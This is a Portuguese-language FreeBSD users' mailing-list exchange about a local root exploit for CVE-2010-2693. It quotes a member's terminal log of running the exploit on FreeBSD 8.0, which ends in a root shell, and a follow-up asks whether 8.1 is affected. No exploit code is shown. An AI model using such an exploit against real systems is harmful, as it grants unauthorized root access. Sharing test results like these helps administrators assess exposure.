[FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro

[Renato Botelho]

2010/8/22 Leandro Keffer <keffer666 at gmail.com>

> Testado em um 8.0 branch 3 e funcionando : (
>
> FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue
> May 25 20:54:11 UTC 2010
> root at amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC
>  amd64
>
> [keffer at fbsd80 /usr/home/keffer]$ ./cve-2010-2693
> [+] checking for setuid /usr/bin/su binary...
> [+] checking for suitable libc library in /lib...
> [+] found libc at /lib/libc.so.7
> [+] found getuid function at 0x00056990
> [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377
> [+] spawning listener thread...
> [+] connecting to listener thread...
> [+] initiating exploit via sendfile...
> [+] exploit complete!
> [+] spawning root shell...
> fbsd80# id
> uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
>
>
Sabe se rola no 8.1-RELEASE?

-- 
Renato Botelho